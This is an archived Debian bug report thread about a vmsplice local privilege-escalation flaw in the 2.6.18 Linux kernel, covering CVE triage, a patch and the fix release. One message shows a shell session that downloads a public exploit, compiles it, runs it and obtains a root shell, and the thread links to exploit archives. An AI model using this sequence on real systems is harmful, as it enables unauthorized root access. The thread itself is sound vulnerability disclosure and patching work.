Debian Bug report logs - #464945
linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

version graph

Package: linux-2.6; Maintainer for linux-2.6 is Debian Kernel Team <debian-kernel@lists.debian.org>;

Reported by: Okulov Vitaliy <vitaliy.okulov@gmail.com>

Date: Sun, 10 Feb 2008 00:21:01 UTC

Severity: critical

Tags: patch, security

Merged with 464953, 465246

Found in versions 2.6.18.dfsg.1-17etch1, 2.6.22-3-generic, 2.6.17-1

Fixed in versions 2.6.24-4, 2.6.18.dfsg.1-18etch1, 2.6.22-6.lenny1

Done: Bastian Blank <waldi@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-image-2.6.18-6-686. Full text and rfc822 format available.

Acknowledgement sent to Okulov Vitaliy <vitaliy.okulov@gmail.com>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Okulov Vitaliy <vitaliy.okulov@gmail.com>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 03:19:20 +0300
Package: linux-image-2.6.18-6-686
Version: 2.6.18.dfsg.1-17etch1
Severity: critical
Tags: security
Justification: root security hole


Just try explot from http://www.milw0rm.com/exploits/5092 at my
linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
from 2.6.24.1 kernel (CVE-2008-0009/10).

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages linux-image-2.6.18-6-686 depends on:
ii  coreutils                    5.97-5.3    The GNU core utilities
ii  debconf [debconf-2.0]        1.5.11etch1 Debian configuration management sy
ii  initramfs-tools [linux-initr 0.85h       tools for generating an initramfs
ii  module-init-tools            3.3-pre4-2  tools for managing Linux kernel mo

Versions of packages linux-image-2.6.18-6-686 recommends:
ii  libc6-i686             2.3.6.ds1-13etch4 GNU C Library: Shared libraries [i

-- debconf information:
  shared/kernel-image/really-run-bootloader: true
  linux-image-2.6.18-6-686/preinst/elilo-initrd-2.6.18-6-686: true
  linux-image-2.6.18-6-686/preinst/already-running-this-2.6.18-6-686:
  linux-image-2.6.18-6-686/postinst/depmod-error-2.6.18-6-686: false
  linux-image-2.6.18-6-686/preinst/initrd-2.6.18-6-686:
  linux-image-2.6.18-6-686/postinst/old-initrd-link-2.6.18-6-686: true
  linux-image-2.6.18-6-686/preinst/bootloader-initrd-2.6.18-6-686: true
  linux-image-2.6.18-6-686/preinst/abort-install-2.6.18-6-686:
  linux-image-2.6.18-6-686/preinst/lilo-has-ramdisk:
  linux-image-2.6.18-6-686/preinst/overwriting-modules-2.6.18-6-686: true
  linux-image-2.6.18-6-686/postinst/bootloader-error-2.6.18-6-686:
  linux-image-2.6.18-6-686/prerm/would-invalidate-boot-loader-2.6.18-6-686: true
  linux-image-2.6.18-6-686/postinst/bootloader-test-error-2.6.18-6-686:
  linux-image-2.6.18-6-686/postinst/create-kimage-link-2.6.18-6-686: true
  linux-image-2.6.18-6-686/postinst/depmod-error-initrd-2.6.18-6-686: false
  linux-image-2.6.18-6-686/preinst/lilo-initrd-2.6.18-6-686: true
  linux-image-2.6.18-6-686/postinst/old-dir-initrd-link-2.6.18-6-686: true
  linux-image-2.6.18-6-686/preinst/failed-to-move-modules-2.6.18-6-686:
  linux-image-2.6.18-6-686/preinst/abort-overwrite-2.6.18-6-686:
  linux-image-2.6.18-6-686/prerm/removing-running-kernel-2.6.18-6-686: true
  linux-image-2.6.18-6-686/postinst/old-system-map-link-2.6.18-6-686: true
  linux-image-2.6.18-6-686/postinst/kimage-is-a-directory:




Bug reassigned from package `linux-image-2.6.18-6-686' to `linux-2.6'. Request was from Gregory Colpart <reg@evolix.fr> to control@bugs.debian.org. (Sun, 10 Feb 2008 02:15:05 GMT) Full text and rfc822 format available.

Merged 464945 464953. Request was from Gregory Colpart <reg@evolix.fr> to control@bugs.debian.org. (Sun, 10 Feb 2008 02:15:06 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Stefan Fritsch <sf@sfritsch.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #14 received at 464945@bugs.debian.org (full text, mbox):

From: Stefan Fritsch <sf@sfritsch.de>
To: 464945@bugs.debian.org
Cc: Okulov Vitaliy <vitaliy.okulov@gmail.com>
Subject: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 09:48:07 +0100
[Message part 1 (text/plain, inline)]
> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

2.6.24.1 does not fix the issue, see

http://marc.info/?l=linux-kernel&m=120262352612128&w=2

I have also verified that the lenny 2.6.22 kernel is vulnerable.
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Stefan Fritsch <sf@sfritsch.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #19 received at 464945@bugs.debian.org (full text, mbox):

From: Stefan Fritsch <sf@sfritsch.de>
To: 464945@bugs.debian.org
Subject: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 10:14:59 +0100
[Message part 1 (text/plain, inline)]
I also checked that linux-image-2.6.18-5-k7 2.6.18.dfsg.1-17 is 
vulnerable.
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #24 received at 464945@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Okulov Vitaliy <vitaliy.okulov@gmail.com>
Cc: 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 10:15:58 +0100
* Okulov Vitaliy:

> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
is not present in the 2.6.18 kernel.





Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Vitaliy Okulov" <vitaliy.okulov@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #29 received at 464945@bugs.debian.org (full text, mbox):

From: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 12:27:22 +0300
[Message part 1 (text/plain, inline)]
Yep, im sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit

doktor@doktor:~/coding/sample$ wget
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--12:25:09--
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
  => `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[=================================================================================================================>]
6,264 28.84K/s

12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

doktor@doktor:~/coding/sample$ vi 27704.c
doktor@doktor:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
doktor@doktor:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
doktor@doktor:~/coding/sample$ head -n 20 27704.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include <stdio.h>
doktor@doktor:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl
doktor@doktor:~/coding/sample$ ./root_expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
root@doktor:~/coding/sample# id
uid=0(root) gid=0(root)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
root@doktor:~/coding/sample# exit
doktor@doktor:~/coding/sample$

So exploit works.

2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
>
> * Okulov Vitaliy:
>
> > Just try explot from http://www.milw0rm.com/exploits/5092 at my
> > linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> > from 2.6.24.1 kernel (CVE-2008-0009/10).
>
> Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
> is not present in the 2.6.18 kernel.
>
>
[Message part 2 (text/html, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #34 received at 464945@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
Cc: 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 10:32:09 +0100
* Vitaliy Okulov:

> Yep, im sure.

Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Vitaliy Okulov" <vitaliy.okulov@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #39 received at 464945@bugs.debian.org (full text, mbox):

From: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 12:39:22 +0300
[Message part 1 (text/plain, inline)]
Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

"The vendor released version 2.6.24.1 to address these issues. Please see
the references for more information."

And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1where
i found only 1 bugfix for vmsplice.

2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
>
> * Vitaliy Okulov:
>
> > Yep, im sure.
>
> Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
>
[Message part 2 (text/html, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Vitaliy Okulov" <vitaliy.okulov@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #44 received at 464945@bugs.debian.org (full text, mbox):

From: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 464945@bugs.debian.org, jens.axboe@oracle.com
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 12:49:21 +0300
[Message part 1 (text/plain, inline)]
Oh, just reread http://marc.info/?l=linux-kernel&m=120262352612128&w=2

Thereis no bugfix.

Whait for Jens Axboe to fix this patch.

2008/2/10, Vitaliy Okulov <vitaliy.okulov@gmail.com>:
>
> Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution
>
> "The vendor released version 2.6.24.1 to address these issues. Please see
> the references for more information."
>
> And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1where i found only 1 bugfix for vmsplice.
>
> 2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
> >
> > * Vitaliy Okulov:
> >
> > > Yep, im sure.
> >
> > Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
> >
>
>
[Message part 2 (text/html, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #49 received at 464945@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
Cc: 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 10:53:03 +0100
* Vitaliy Okulov:

> Oh, just reread http://marc.info/?l=linux-kernel&m=120262352612128&w=2
>
> Thereis no bugfix.

Yes, it appears to be a different bug.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to Bastian Blank <waldi@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #54 received at 464945@bugs.debian.org (full text, mbox):

From: Bastian Blank <waldi@debian.org>
To: Okulov Vitaliy <vitaliy.okulov@gmail.com>, 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Sun, 10 Feb 2008 13:00:33 +0100
[Message part 1 (text/plain, inline)]
tags 464945 patch

On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

Preliminary patch, it includes more checks then the update in 2.6.24.1.

It at least fixes the exploit.

Bastian
[patch (text/plain, attachment)]
[signature.asc (application/pgp-signature, inline)]

Tags added: patch Request was from Bastian Blank <waldi@debian.org> to control@bugs.debian.org. (Sun, 10 Feb 2008 12:03:06 GMT) Full text and rfc822 format available.

Bug marked as found in version 2.6.18.dfsg.1-17etch1. Request was from "Artur R. Czechowski" <arturcz@hell.pl> to control@bugs.debian.org. (Sun, 10 Feb 2008 19:45:05 GMT) Full text and rfc822 format available.

Tags added: pending Request was from Bastian Blank <waldi@alioth.debian.org> to control@bugs.debian.org. (Mon, 11 Feb 2008 08:51:19 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Kernel Team <debian-kernel@lists.debian.org>:
Bug#464945; Package linux-2.6. Full text and rfc822 format available.

Acknowledgement sent to "Vitaliy Okulov" <vitaliy.okulov@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian Kernel Team <debian-kernel@lists.debian.org>. Full text and rfc822 format available.

Message #65 received at 464945@bugs.debian.org (full text, mbox):

From: "Vitaliy Okulov" <vitaliy.okulov@gmail.com>
To: "Bastian Blank" <waldi@debian.org>
Cc: 464945@bugs.debian.org
Subject: Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)
Date: Mon, 11 Feb 2008 12:43:12 +0300
[Message part 1 (text/plain, inline)]
Ok, patch work for me.

2008/2/10, Bastian Blank <waldi@debian.org>:
>
> tags 464945 patch
>
> On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
> > Just try explot from http://www.milw0rm.com/exploits/5092 at my
> > linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> > from 2.6.24.1 kernel (CVE-2008-0009/10).
>
> Preliminary patch, it includes more checks then the update in 2.6.24.1.
>
> It at least fixes the exploit.
>
> Bastian
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iEYEARECAAYFAkeu52EACgkQnw66O/MvCNEfrQCfbFbdVcfe4VblSOxNOLiY9d9F
> GQoAoJCiusdKbBIaZOIUX5YwugsgNRwk
> =VaLS
> -----END PGP SIGNATURE-----
>
>
>
[Message part 2 (text/html, inline)]

Forcibly Merged 464945 464953 465246. Request was from Bastian Blank <waldi@debian.org> to control@bugs.debian.org. (Mon, 11 Feb 2008 12:57:03 GMT) Full text and rfc822 format available.

Reply sent to Bastian Blank <waldi@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Okulov Vitaliy <vitaliy.okulov@gmail.com>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #72 received at 464945-close@bugs.debian.org (full text, mbox):

From: Bastian Blank <waldi@debian.org>
To: 464945-close@bugs.debian.org
Subject: Bug#464945: fixed in linux-2.6 2.6.24-4
Date: Mon, 11 Feb 2008 13:02:15 +0000
Source: linux-2.6
Source-Version: 2.6.24-4

We believe that the bug you reported is fixed in the latest version of
linux-2.6, which is due to be installed in the Debian FTP archive:

linux-2.6_2.6.24-4.diff.gz
  to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.diff.gz
linux-2.6_2.6.24-4.dsc
  to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.dsc
linux-doc-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-doc-2.6.24_2.6.24-4_all.deb
linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
linux-libc-dev_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-libc-dev_2.6.24-4_powerpc.deb
linux-manual-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-manual-2.6.24_2.6.24-4_all.deb
linux-patch-debian-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-patch-debian-2.6.24_2.6.24-4_all.deb
linux-source-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-source-2.6.24_2.6.24-4_all.deb
linux-support-2.6.24-1_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-support-2.6.24-1_2.6.24-4_all.deb
linux-tree-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-tree-2.6.24_2.6.24-4_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 464945@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastian Blank <waldi@debian.org> (supplier of updated linux-2.6 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 12:29:23 +0100
Source: linux-2.6
Binary: linux-source-2.6.24 linux-doc-2.6.24 linux-manual-2.6.24 linux-patch-debian-2.6.24 linux-tree-2.6.24 linux-support-2.6.24-1 linux-libc-dev linux-headers-2.6.24-1-all linux-headers-2.6.24-1-all-alpha linux-headers-2.6.24-1-common linux-image-2.6.24-1-alpha-generic linux-headers-2.6.24-1-alpha-generic linux-image-2.6.24-1-alpha-smp linux-headers-2.6.24-1-alpha-smp linux-image-2.6.24-1-alpha-legacy linux-headers-2.6.24-1-alpha-legacy linux-headers-2.6.24-1-all-amd64 linux-image-2.6.24-1-amd64 linux-headers-2.6.24-1-amd64 linux-headers-2.6.24-1-all-arm linux-image-2.6.24-1-footbridge linux-headers-2.6.24-1-footbridge linux-image-2.6.24-1-iop32x linux-headers-2.6.24-1-iop32x linux-image-2.6.24-1-ixp4xx linux-headers-2.6.24-1-ixp4xx linux-headers-2.6.24-1-all-armel linux-image-2.6.24-1-versatile linux-headers-2.6.24-1-versatile linux-headers-2.6.24-1-all-hppa linux-image-2.6.24-1-parisc linux-headers-2.6.24-1-parisc linux-image-2.6.24-1-parisc-smp linux-headers-2.6.24-1-parisc-smp linux-image-2.6.24-1-parisc64 linux-headers-2.6.24-1-parisc64 linux-image-2.6.24-1-parisc64-smp linux-headers-2.6.24-1-parisc64-smp linux-headers-2.6.24-1-all-i386 linux-image-2.6.24-1-486 linux-headers-2.6.24-1-486 linux-image-2.6.24-1-686 linux-headers-2.6.24-1-686 linux-image-2.6.24-1-686-bigmem linux-headers-2.6.24-1-686-bigmem linux-headers-2.6.24-1-common-xen linux-image-2.6.24-1-xen-686 linux-modules-2.6.24-1-xen-686 linux-headers-2.6.24-1-xen-686 linux-headers-2.6.24-1-all-ia64 linux-image-2.6.24-1-itanium linux-headers-2.6.24-1-itanium linux-image-2.6.24-1-mckinley linux-headers-2.6.24-1-mckinley linux-headers-2.6.24-1-all-m68k linux-image-2.6.24-1-amiga linux-headers-2.6.24-1-amiga linux-image-2.6.24-1-atari linux-headers-2.6.24-1-atari linux-image-2.6.24-1-bvme6000 linux-headers-2.6.24-1-bvme6000 linux-image-2.6.24-1-mac linux-headers-2.6.24-1-mac linux-image-2.6.24-1-mvme147 linux-headers-2.6.24-1-mvme147 linux-image-2.6.24-1-mvme16x linux-headers-2.6.24-1-mvme16x linux-headers-2.6.24-1-all-mips linux-image-2.6.24-1-r4k-ip22 linux-headers-2.6.24-1-r4k-ip22 linux-image-2.6.24-1-r5k-ip32 linux-headers-2.6.24-1-r5k-ip32 linux-image-2.6.24-1-sb1-bcm91250a linux-headers-2.6.24-1-sb1-bcm91250a linux-image-2.6.24-1-sb1a-bcm91480b linux-headers-2.6.24-1-sb1a-bcm91480b linux-image-2.6.24-1-4kc-malta linux-headers-2.6.24-1-4kc-malta linux-image-2.6.24-1-5kc-malta linux-headers-2.6.24-1-5kc-malta linux-headers-2.6.24-1-all-mipsel linux-image-2.6.24-1-r5k-cobalt linux-headers-2.6.24-1-r5k-cobalt linux-headers-2.6.24-1-all-powerpc linux-image-2.6.24-1-powerpc linux-headers-2.6.24-1-powerpc linux-image-2.6.24-1-powerpc-smp linux-headers-2.6.24-1-powerpc-smp linux-image-2.6.24-1-powerpc-miboot linux-headers-2.6.24-1-powerpc-miboot linux-image-2.6.24-1-powerpc64 linux-headers-2.6.24-1-powerpc64 linux-headers-2.6.24-1-all-s390 linux-image-2.6.24-1-s390 linux-headers-2.6.24-1-s390 linux-image-2.6.24-1-s390-tape linux-image-2.6.24-1-s390x linux-headers-2.6.24-1-s390x linux-headers-2.6.24-1-all-sparc linux-image-2.6.24-1-sparc64 linux-headers-2.6.24-1-sparc64 linux-image-2.6.24-1-sparc64-smp linux-headers-2.6.24-1-sparc64-smp
Architecture: source all powerpc
Version: 2.6.24-4
Distribution: unstable
Urgency: low
Maintainer: Debian Kernel Team <debian-kernel@lists.debian.org>
Changed-By: Bastian Blank <waldi@debian.org>
Description: 
 linux-doc-2.6.24 - Linux kernel specific documentation for version 2.6.24
 linux-headers-2.6.24-1-all - All header files for Linux 2.6.24
 linux-headers-2.6.24-1-all-powerpc - All header files for Linux 2.6.24
 linux-headers-2.6.24-1-common - Common header files for Linux 2.6.24
 linux-headers-2.6.24-1-powerpc - Header files for Linux 2.6.24 on uniprocessor 32-bit PowerPC
 linux-headers-2.6.24-1-powerpc-miboot - Header files for Linux 2.6.24 on 32-bit PowerPC for miboot floppy
 linux-headers-2.6.24-1-powerpc-smp - Header files for Linux 2.6.24 on multiprocessor 32-bit PowerPC
 linux-headers-2.6.24-1-powerpc64 - Header files for Linux 2.6.24 on 64-bit PowerPC
 linux-image-2.6.24-1-powerpc - Linux 2.6.24 image on uniprocessor 32-bit PowerPC
 linux-image-2.6.24-1-powerpc-miboot - Linux 2.6.24 image on 32-bit PowerPC for miboot floppy
 linux-image-2.6.24-1-powerpc-smp - Linux 2.6.24 image on multiprocessor 32-bit PowerPC
 linux-image-2.6.24-1-powerpc64 - Linux 2.6.24 image on 64-bit PowerPC
 linux-libc-dev - Linux Kernel Headers for development
 linux-manual-2.6.24 - Linux kernel API manual pages for version 2.6.24
 linux-patch-debian-2.6.24 - Debian patches to version 2.6.24 of the Linux kernel
 linux-source-2.6.24 - Linux kernel source for version 2.6.24 with Debian patches
 linux-support-2.6.24-1 - Support files for Linux 2.6.24
 linux-tree-2.6.24 - Linux kernel source tree for building Debian kernel images
Closes: 464945
Changes: 
 linux-2.6 (2.6.24-4) unstable; urgency=low
 .
   * Add stable release 2.6.24.1:
     - splice: missing user pointer access verification (CVE-2008-0009/10)
     - drm: the drm really should call pci_set_master..
     - Driver core: Revert "Fix Firmware class name collision"
     - fix writev regression: pan hanging unkillable and un-straceable
     - sched: fix high wake up latencies with FAIR_USER_SCHED
     - sched: let +nice tasks have smaller impact
     - b43: Reject new firmware early
     - selinux: fix labeling of /proc/net inodes
     - b43legacy: fix DMA slot resource leakage
     - b43legacy: drop packets we are not able to encrypt
     - b43legacy: fix suspend/resume
     - b43legacy: fix PIO crash
     - b43: Fix dma-slot resource leakage
     - b43: Drop packets we are not able to encrypt
     - b43: Fix suspend/resume
     - sky2: fix for WOL on some devices
     - sky2: restore multicast addresses after recovery
     - x86: restore correct module name for apm
     - ACPI: update ACPI blacklist
     - PCI: Fix fakephp deadlock
     - sys_remap_file_pages: fix ->vm_file accounting
